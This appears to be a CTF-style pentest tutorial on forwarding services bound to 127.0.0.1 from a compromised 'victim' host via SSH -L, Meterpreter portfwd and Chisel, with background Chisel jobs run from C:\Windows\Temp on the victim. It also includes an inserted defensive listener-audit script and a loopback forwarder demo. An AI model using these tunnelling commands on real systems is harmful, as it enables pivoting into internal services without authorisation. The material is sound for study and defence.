Author: lomar
Port Forwarding
When a service on the target machine listens only on the IPv4 loopback address 127.0.0.1, we may still need to reach it from our own host. In such cases we can reach the service by forwarding the port it listens on to our host machine. There are three common ways to do this port forwarding.
Method 1: SSH
If we can access the victim machine over SSH, we can easily perform port forwarding over that SSH connection. If you want to perform port forwarding and get a shell at the same time:
ssh user_name@victim.htb -L local_port:127.0.0.1:remote_port

For example:
- There is a service running on port 8080 and listening on 127.0.0.1 on the victim machine
- We want to forward it to port 8080 of our machine
ssh user_name@victim.htb -L 8080:127.0.0.1:8080

Running in the Background
If you only want to perform port forwarding and do not want to run commands over SSH, add -f (go to the background after authentication) and -N (do not execute a remote command):

ssh user_name@victim.htb -fNL local_port:127.0.0.1:remote_port

For example:
- There is a service running on port 8080 and listening on 127.0.0.1 on the victim machine
- We want to forward it to port 8080 of our machine
ssh user_name@victim.htb -fNL 8080:127.0.0.1:8080

Method 2: Meterpreter portfwd
The portfwd command from within the Meterpreter shell is most commonly used as a pivoting technique, allowing direct access to machines otherwise inaccessible from the attacking system. Running this command on a compromised host with access to both the attacker and destination network (or system), we can essentially forward TCP connections through this machine, effectively making it a pivot point. Much like the port forwarding technique used with an ssh connection, portfwd will relay TCP connections to and from the connected machines.
meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
-L <opt> The local host to listen on (optional).
-h Help banner.
-l <opt> The local port to listen on.
-p <opt> The remote port to connect on.
-r <opt> The remote host to connect on.
meterpreter >

- -L: The host to listen on. Unless you need the forward bound to a specific network adapter you can omit this option; if none is given, 0.0.0.0 (all interfaces) is used.
- -h: Displays the help banner above.
- -l: The local port that will listen on the attacking machine. Connections to this port are forwarded to the remote system.
- -p: The port on the remote host to which the TCP connections are forwarded.
- -r: The IP address the connections are relayed to (the target).
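A defender-side check, added here as an example and not part of the original post: every method on this page creates a new listening socket somewhere (with the -L default above, bound to 0.0.0.0, i.e. every interface). The script parses constructed `ss -tlnp` output, compares each listener against an allowlist of expected (process, port) pairs, and reports the rest, flagging those exposed on all interfaces. The sample output lines, the process names and the allowlist are all made up for the example.

```python
import re
from typing import Dict, List, Set, Tuple

# Constructed sample of `ss -tlnp` output (not captured from any real host).
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    127.0.0.1:3306      0.0.0.0:*         users:(("mysqld",pid=901,fd=21))
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=612,fd=3))
LISTEN 0      128    0.0.0.0:8080        0.0.0.0:*         users:(("ssh",pid=4242,fd=5))
LISTEN 0      4096   *:51234             *:*               users:(("chisel",pid=5150,fd=7))
LISTEN 0      128    [::1]:8001          [::]:*            users:(("chisel",pid=5150,fd=9))
"""

# Hypothetical allowlist of (process, port) pairs this host is supposed to expose.
EXPECTED_LISTENERS: Set[Tuple[str, int]] = {("sshd", 22), ("mysqld", 3306)}

# Addresses that mean "bound to every interface" in ss output.
WILDCARD_ADDRS = {"0.0.0.0", "*", "[::]", "::"}

# Extracts the first process name and pid from users:(("name",pid=N,fd=M))
_PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+)')


def parse_ss_listeners(text: str) -> List[Dict]:
    """Turn `ss -tlnp` lines into dicts with addr, port, process and pid."""
    listeners = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5 or parts[0] != "LISTEN":
            continue  # header or malformed line
        addr, port = parts[3].rsplit(":", 1)  # handles 0.0.0.0:22, *:51234, [::1]:8001
        match = _PROC_RE.search(line)
        listeners.append({
            "addr": addr,
            "port": int(port),
            "process": match.group(1) if match else None,
            "pid": int(match.group(2)) if match else None,
        })
    return listeners


def audit_listeners(text: str, expected: Set[Tuple[str, int]] = EXPECTED_LISTENERS) -> List[str]:
    """Report every listener not on the allowlist, noting how widely it is exposed."""
    findings = []
    for l in parse_ss_listeners(text):
        if (l["process"], l["port"]) in expected:
            continue
        exposure = "all interfaces" if l["addr"] in WILDCARD_ADDRS else l["addr"]
        findings.append(
            f"unexpected listener {l['process']} (pid {l['pid']}) "
            f"on port {l['port']} bound to {exposure}"
        )
    return findings


if __name__ == "__main__":
    for finding in audit_listeners(SAMPLE_SS_OUTPUT):
        print(finding)
```

On a real host, feed it the output of `ss -tlnp` and maintain the allowlist per role; a forward created by ssh, chisel or a Meterpreter session shows up as a listener owned by a process that has no business listening, and the "all interfaces" cases are the ones that also expose the forwarded service to the rest of the network.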
Add
meterpreter > portfwd add -l <local_port> -p <target_port> -r <target_ip>

Delete
meterpreter > portfwd delete -l <local_port> -p <target_port> -r <target_ip>

For example:
- There is a service running on port 8080 and listening on 127.0.0.1 on the victim machine
- We want to forward it to port 8080 of our machine
meterpreter > portfwd add -l 8080 -p 8080 -r 127.0.0.1

Flush
This argument removes all local port forwards at once.

meterpreter > portfwd flush

Method 3: Chisel
Linux
Server
To work with Chisel, we first run a Chisel server on our host machine, specifying the port it listens on. The client below uses reverse remotes (R:), so the server must be started with --reverse or it will reject them:

chisel server --port 51234 --reverse

Client
To route the victim's local services to our host, we run the Chisel client on the victim machine and give it one reverse remote per service. A remote of the form R:local_host:local_port:remote_host:remote_port makes the server (our host) listen on local_host:local_port and relay those connections to remote_host:remote_port as seen from the victim:

chisel client your_machine_ip:51234 R:127.0.0.1:8001:127.0.0.1:8001 R:127.0.0.1:8443:127.0.0.1:8443

Windows
Server
Run on our host. --reverse is required for the client's R: remotes, and --socks5 additionally enables a SOCKS5 proxy over the tunnel:

$scriptBlock = { Start-Process C:\Windows\Temp\chisel.exe -ArgumentList @('server','--port 50001','--reverse','--socks5') }
Start-Job -ScriptBlock $scriptBlock

Client
Run on the victim as a background job so the current shell stays usable. It connects to our server (here 10.0.0.2:50001, the port the server above listens on) and exposes the victim's 127.0.0.1:3306 as 127.0.0.1:33060 and its 127.0.0.1:80 as 127.0.0.1:8800 on our host:

$scriptBlock = { Start-Process C:\Windows\Temp\chisel.exe -ArgumentList @('client','10.0.0.2:50001','R:127.0.0.1:33060:127.0.0.1:3306','R:127.0.0.1:8800:127.0.0.1:80') }
Start-Job -ScriptBlock $scriptBlock
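All three methods above (ssh -L, Meterpreter portfwd and a Chisel remote) do the same thing mechanically: bind a listening socket on one host and relay each accepted TCP connection, byte for byte in both directions, to a target address. The following minimal forwarder, added here as an example and not code from the original post or from any of those tools, shows that mechanism end to end. It is self-contained: start_echo_service is a constructed stand-in for the "service listening on 127.0.0.1" from the examples, PortForwarder plays the role of the tunnel, and demo sends a payload through the forward and returns what came back. Only loopback ports chosen by the OS are used.

```python
import socket
import threading


def _stop_listener(sock: socket.socket) -> None:
    """Close a listening socket so that a thread blocked in accept() returns."""
    try:
        sock.shutdown(socket.SHUT_RDWR)
    except OSError:
        pass
    sock.close()


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until src reaches EOF, then half-close dst."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)  # propagate EOF so the far side finishes too
        except OSError:
            pass


def _relay(client: socket.socket, target: tuple) -> None:
    """Connect to the target and pump both directions for one accepted client."""
    try:
        upstream = socket.create_connection(target, timeout=5)
        upstream.settimeout(None)  # connect timeout only; relay may be long-lived
    except OSError:
        client.close()
        return
    back = threading.Thread(target=_pump, args=(upstream, client), daemon=True)
    back.start()
    _pump(client, upstream)
    back.join()
    upstream.close()
    client.close()


class PortForwarder:
    """Listen on listen_host:listen_port and relay to target_host:target_port."""

    def __init__(self, listen_host: str, listen_port: int, target_host: str, target_port: int):
        self.target = (target_host, target_port)
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.listener.bind((listen_host, listen_port))
        self.listener.listen(16)
        self.listen_port = self.listener.getsockname()[1]  # actual port when 0 was given
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self) -> None:
        while True:
            try:
                client, _ = self.listener.accept()
            except OSError:
                return  # listener closed
            threading.Thread(target=_relay, args=(client, self.target), daemon=True).start()

    def close(self) -> None:
        _stop_listener(self.listener)


def start_echo_service() -> socket.socket:
    """Constructed stand-in for the local service on 127.0.0.1: echoes what it receives."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(4)

    def serve() -> None:
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                while data := conn.recv(4096):
                    conn.sendall(data)

    threading.Thread(target=serve, daemon=True).start()
    return srv


def demo(payload: bytes = b"hello through the forward") -> bytes:
    """Run service and forwarder, send payload through the forward, return the echo."""
    service = start_echo_service()
    fwd = PortForwarder("127.0.0.1", 0, "127.0.0.1", service.getsockname()[1])
    try:
        with socket.create_connection(("127.0.0.1", fwd.listen_port), timeout=5) as c:
            c.sendall(payload)
            c.shutdown(socket.SHUT_WR)  # our EOF travels through the forwarder as well
            received = b"".join(iter(lambda: c.recv(4096), b""))
    finally:
        fwd.close()
        _stop_listener(service)
    return received


if __name__ == "__main__":
    print(demo())
```

The half-close handling in _pump is the part most toy relays get wrong: without forwarding EOF in each direction, a client that finishes sending never sees the service finish either, and connections hang instead of closing. The forwarder binds to 127.0.0.1 in demo on purpose; binding to 0.0.0.0, the portfwd default, would make the relayed service reachable from every interface of the host running it.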